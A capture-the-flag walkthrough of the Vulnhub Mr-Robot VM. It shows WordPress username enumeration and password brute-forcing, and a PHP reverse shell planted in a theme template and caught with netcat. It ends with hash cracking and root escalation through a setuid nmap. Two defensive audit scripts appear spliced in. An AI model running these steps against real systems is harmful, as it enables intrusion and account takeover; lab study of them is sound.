Vulnhub – Mr-Robot: 1

Since I enjoy the show Mr. Robot, I had to try this VM out. The point of this game is to find 3 keys hidden in the VM. The link to download the VM can be located here. Let's get started!

Description from author:

Based on the show, Mr. Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

The Attack

Kali Linux machine

192.168.182.147

Using the tool netdiscover, I found the victim VM to be 192.168.182.158

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Using nmap to do a version scan of the victim. Let's see what we find.

root@kali:~# nmap -sV 192.168.182.158

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-29 00:14 CDT
Nmap scan report for 192.168.182.158
Host is up (0.00033s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd
MAC Address: 00:0C:29:29:A5:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.26 seconds
root@kali:~# 

Looks like the victim is running Apache on ports 80/tcp and 443/tcp. Safe to assume that we will be pwning a web server. Let's do some further scanning on the victim using nikto to find any vulnerabilities on the system.

root@kali:~# nikto -h 192.168.182.158
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.182.158
+ Target Hostname:    192.168.182.158
+ Target Port:        80
+ Start Time:         2017-03-29 02:25:24 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad 
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: ; rel=shortlink
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A WordPress installation was found.
+ /wp-admin/wp-login.php: WordPress login found
+ /blog/wp-login.php: WordPress login found
+ /wp-login.php: WordPress login found
+ 7535 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2017-03-29 02:28:48 (GMT-5) (204 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

With nikto I was able to see that it was a WordPress site. I also see the /wp-login.php, readme.html, license.txt, and robots.txt files, which look pretty interesting. Before we check these files, let's browse the web server and see what it gives us.

Well, the server gives us a fancy intro, then a message and a list of commands that we can run. None of them were that interesting except the join command, which asks for your email to "join" them. I didn't put in any email. Instead I looked into the files stated earlier. Let's check them out!

BINGO! Found the first key, which turned out to be 073403c8a58a1f80d943455fb30724b9, and also found a file called fsocity.dic, which turns out to be a dictionary file. Maybe we will use this later? For now let's save the file and continue on with the attack.

Key 1:

073403c8a58a1f80d943455fb30724b9

Well, according to the readme.html file the victim is running WordPress version 4.3.9. I checked the license.txt file but found nothing of interest in there. Now let's check out /wp-login.php.

When viewing the page, I decided to see if there were any default usernames and passwords by inputting admin:admin, but it said the username was invalid. However, having watched the show and knowing that the main character is Elliot, I decided to input elliot as both the username and the password.

Looks like we are on to something! I got the password wrong, but WordPress confirms that elliot is a username on the site (the login error for an unknown username differs from the one for a wrong password, which is what gives the account away). I will be doing a dictionary attack on the WordPress login using the fsocity.dic file I acquired earlier. Before I do the dictionary attack, I will try to make the password list smaller using the commands listed below. This will make the attack go faster when trying to acquire elliot's password.

root@kali:~/Documents# wc -l fsocity.dic 
858160 fsocity.dic
root@kali:~/Documents# cat fsocity.dic | sort -u | wc -l
11451
root@kali:~/Documents# cat fsocity.dic | sort -u | uniq > Newfsocity.dic

I was able to cut the dictionary down from 858160 words to 11451 and saved the shorter dictionary to Newfsocity.dic. Now let's use wpscan to get elliot's password.

root@kali:~# wpscan --url 192.168.182.158 --wordlist /root/Documents/Newfsocity.dic --username elliot
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.182.158/
[+] Started: Wed Mar 29 02:07:39 2017

[+] robots.txt available under: 'http://192.168.182.158/robots.txt'
[!] The WordPress 'http://192.168.182.158/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] XML-RPC Interface available under: http://192.168.182.158/xmlrpc.php

[+] WordPress version 4.3.9 identified from rss generator

[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
  Brute Forcing 'elliot' Time: 00:02:02 <====================================                                      > (5634 / 11452) 49.19%  ETA: 00:02:07
  [+] [SUCCESS] Login : elliot Password : ER28-0652


  +----+--------+------+-----------+
  | Id | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | elliot |      | ER28-0652 |
  +----+--------+------+-----------+

[+] Finished: Wed Mar 29 02:09:43 2017
[+] Requests Done: 5694
[+] Memory used: 29.953 MB
[+] Elapsed time: 00:02:04
root@kali:~/Downloads# 

Nice! Elliot's password is ER28-0652. Now let's log in.


It worked! There are many things I can do from here, like checking which installed plugins are vulnerable so we can exploit them, but since elliot is the Administrator, I am going to try to upload a PHP file to get a reverse shell.

Note: I got the php-reverse-shell from pentestmonkey. The link to the file can be located here. Also, before uploading the file, make sure to edit the ip variable and the port variable. In my case my IP is 192.168.182.147 and the port I will use is 1234.

With that done, let's upload the file!

Well, looks like WordPress is set up to block my PHP file from uploading. They probably have wp-config.php set up this way. It's all good, I still have another trick up my sleeve. Let's edit one of the theme files and put our code from the php-reverse-shell file there instead. Go to Appearance -> Editor -> 404 Template. Add the code to the bottom and click Update File. It should look like the picture below.

Now set up the listener to catch the reverse shell.

root@kali:~# nc -lvp 1234
listening on [any] 1234 ...

We have the listener set up and ready to go. Now I am going to use curl to request the 404 template so the reverse shell code runs and connects back to our listener.

Used to get the reverse shell going:

root@kali:~# curl http://192.168.182.158/404.php

On the listener side:

root@kali:~# nc -lvp 1234
listening on [any] 1234 ...
192.168.182.158: inverse host lookup failed: Unknown host
connect to [192.168.182.147] from (UNKNOWN) [192.168.182.158] 41061
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 05:14:30 up  4:25,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ whoami
daemon
$ hostname
linux
$ 

Got a shell back as the user daemon. Let's see if we can spawn a TTY shell. Netsec has a good blog on helping with that. I recommend you all check him out. His blog post on spawning a TTY shell can be located here.
I used the code below to spawn a TTY shell.

python -c 'import pty; pty.spawn("/bin/sh")'

With that, I snooped around and found key 2 in the /home/robot/ directory, but got permission denied. I would have to be the robot user (or root) to view it. However, I did find a password.raw-md5 file. Maybe this might be a password to log in as robot? Let's open the file up.

$ ls
ls
key-2-of-3.txt	password.raw-md5
$ ls -l
ls -l
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
$ 

BINGO! I have the password hash for robot. I used crackstation.net to crack the password, which turned out to be abcdefghijklmnopqrstuvwxyz. Alright, let's log in as robot.
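The record above is an unsalted MD5 of a dictionary word, which is why a lookup service recovers it instantly. As an added example (not part of the original write-up), this function confirms a candidate password against a "user:md5hex" record the way the file stores it; it assumes md5sum from coreutils is on PATH, and it hashes with printf rather than echo, a common pitfall that makes a correct password appear wrong.

```shell
#!/bin/sh
# Added example, not part of the original write-up: confirm a candidate
# password against a "user:md5hex" record like /home/robot/password.raw-md5.
# Assumes md5sum (coreutils) is on PATH.

# Constructed copy of the record found on the VM.
RAW_MD5_RECORD='robot:c3fcd3d76192e4007dfb496cca67e13b'

# Usage: check_raw_md5 'user:hash' candidate
# Exit status: 0 = candidate matches, 1 = no match, 2 = record is not raw MD5.
check_raw_md5() {
    record=$1
    candidate=$2
    user=${record%%:*}
    stored=${record#*:}
    # Raw MD5 is exactly 32 hex digits; reject anything else (for example a
    # salted $1$ crypt string) rather than silently reporting "no match".
    if ! printf '%s' "$stored" | grep -Eqx '[0-9a-fA-F]{32}'; then
        printf 'record for %s is not a raw MD5 hash\n' "$user" >&2
        return 2
    fi
    # printf, not echo: echo appends a newline, so the digest would be of
    # "candidate\n" and would never match the stored value.
    computed=$(printf '%s' "$candidate" | md5sum | cut -d' ' -f1)
    stored_lc=$(printf '%s' "$stored" | tr 'A-F' 'a-f')
    if [ "$computed" = "$stored_lc" ]; then
        printf 'match for user %s\n' "$user"
        return 0
    fi
    return 1
}

check_raw_md5 "$RAW_MD5_RECORD" 'abcdefghijklmnopqrstuvwxyz'
```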

$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz

$ whoami
whoami
robot
$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
$ 

Now that we are logged in as robot, let's get our 2nd key.

$ pwd
pwd
/home/robot
$ ls  
ls
key-2-of-3.txt	password.raw-md5
$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
$ 

2nd Key:

822c73956184f694993bede3eb39f959

Got our 2nd key. Now let's try to get root! Let's try to find any files that have the SUID bit set.

$  find / -perm -4000 2>/dev/null
 find / -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
$ 

Well, looks like we can run nmap as root since it has the SUID bit set. Let's check the version of nmap to see if it still supports interactive mode.
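The find command above is also how a defender spots this misconfiguration. As an added example (not part of the original write-up), the script below compares a setuid listing against a constructed baseline of paths that are normal on a host like this VM, so an out-of-place entry such as /usr/local/bin/nmap stands out; the baseline and the sample listing are constructed from the output shown above.

```shell
#!/bin/sh
# Added example, not part of the original write-up: report setuid binaries
# that are not on an expected baseline, so an out-of-place copy such as
# /usr/local/bin/nmap stands out during a host review.

# Constructed baseline of setuid paths that are normal on a host like this
# VM (Ubuntu 14.04 guest with VMware tools). Tailor it to your own fleet.
SUID_BASELINE='/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown'

# Read setuid paths from stdin and print those missing from the baseline.
# Live use: find / -perm -4000 -type f 2>/dev/null | unexpected_suid
unexpected_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        # -x matches the whole line, -F treats the path literally.
        if ! printf '%s\n' "$SUID_BASELINE" | grep -qxF -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# Constructed sample: a subset of the find output captured on the VM above.
SAMPLE_FIND_OUTPUT='/bin/ping
/bin/su
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown'

# Run the audit over the sample; only /usr/local/bin/nmap is reported.
audit_sample() {
    printf '%s\n' "$SAMPLE_FIND_OUTPUT" | unexpected_suid
}

audit_sample
```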

$ /usr/local/bin/nmap --version
/usr/local/bin/nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )
$ 

Nmap is running version 3.81, which means we can run nmap in interactive mode. We can use this to execute shell commands and get a root shell. I found a helpful post called Why You Can't Un-Root a Compromised Machine.
Check it out, it's very helpful. Now let's get our root shell and our last key.

$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
!sh
# whoami
whoami
root
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# 

We got a root shell! Let's go to the root directory and get our last key.

# cd /root
cd /root
# ls
ls
firstboot_done	key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Key 3:

04787ddef27c3dee1ee161b21670b4e4

Conclusion

Well, there you go, I got all 3 keys and a root shell on our victim VM. Had fun with this one since it dealt with Mr. Robot, which is a really cool show. I recommend it to anyone interested in watching it. That's it for now. Till next time!
